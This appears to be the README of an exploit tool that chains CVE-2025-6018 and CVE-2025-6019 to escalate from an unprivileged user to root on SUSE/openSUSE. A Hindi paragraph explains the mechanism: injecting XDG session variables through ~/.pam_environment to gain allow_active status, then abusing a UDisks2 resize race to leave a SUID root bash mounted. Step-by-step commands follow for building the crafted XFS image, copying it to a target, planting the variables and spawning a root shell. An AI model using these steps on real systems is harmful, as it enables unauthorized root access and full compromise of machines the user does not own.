
Exploit Chain of CVE-2025-6018 to CVE-2025-6019
https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
यह एक्सप्लॉइट CVE-2025-6018 और CVE-2025-6019 को जोड़कर, कमजोर SUSE/openSUSE सिस्टम पर एक अविशेषाधिकार प्राप्त उपयोगकर्ता से रूट तक स्थानीय विशेषाधिकार वृद्धि प्राप्त करता है। CVE-2025-6018, pam_env.so (संस्करण 1.3.0-1.6.0) में एक PAM (प्लगेबल प्रमाणीकरण मॉड्यूल) पर्यावरण चर इंजेक्शन भेद्यता है, जो उपयोगकर्ताओं को OVERRIDE निर्देश के माध्यम से ~/.pam_environment के जरिए अपने सत्र पर्यावरण को दूषित करने की अनुमति देती है। XDG सत्र चर (XDG_SEAT, XDG_VTNR, XDG_SESSION_TYPE) में हेरफेर करके, एक हमलावर systemd-logind को allow_active PolicyKit विशेषाधिकार प्रदान करने के लिए धोखा दे सकता है, जिससे रिमोट SSH सत्र स्थानीय भौतिक सत्र के रूप में दिखाई देता है। एक बार allow_active स्थिति प्राप्त होने पर, CVE-2025-6019 का शोषण किया जा सकता है: UDisks2/libblockdev में यह भेद्यता allow_active अनुमति वाले उपयोगकर्ताओं को Filesystem.Resize D-Bus विधि में एक दौड़ की स्थिति के माध्यम से विशेषाधिकार प्राप्त विकल्पों (exec, suid) के साथ फाइलसिस्टम माउंट करने की अनुमति देती है। जब SUID रूट bash बाइनरी वाले क्राफ्टेड XFS फाइलसिस्टम वाले लूप डिवाइस पर एक रीसाइज़ ऑपरेशन ट्रिगर किया जाता है, तो libblockdev स्वचालित रूप से रीसाइज़ करने के लिए फाइलसिस्टम को माउंट करता है, लेकिन रीसाइज़ त्रुटि के कारण इसे अनमाउंट करने में विफल रहता है, जिससे SUID bash /tmp/blockdev*/ में सुलभ रहता है, जिसे बाद में रूट शेल प्राप्त करने के लिए निष्पादित किया जा सकता है।
sudo ./ExploitChain.sh stage1 [output_path]
# Default: ./xfs.image
# Creates 300MB XFS filesystem with SUID root bash
scp xfs.image user@<target_ip>:/tmp/
./ExploitChain.sh stage2
# Creates ~/.pam_environment with malicious XDG variables
# MUST logout and login to trigger PAM processing
logout
ssh user@<target_ip>
# PAM processes ~/.pam_environment on login
# systemd-logind grants allow_active status
./ExploitChain.sh stage3 /tmp/xfs.image
# Exploits UDisks2 Filesystem.Resize bug
# Mounts XFS image with SUID bash
# Spawns root shell
# On Kali (auto-detects root and runs stage1)
sudo ./Exploit-6018-Chain-6019-v3.sh auto
# On target (auto-detects stage and runs stage2/stage3)
./ExploitChain.sh auto /tmp/xfs.image
./ExploitChain.sh help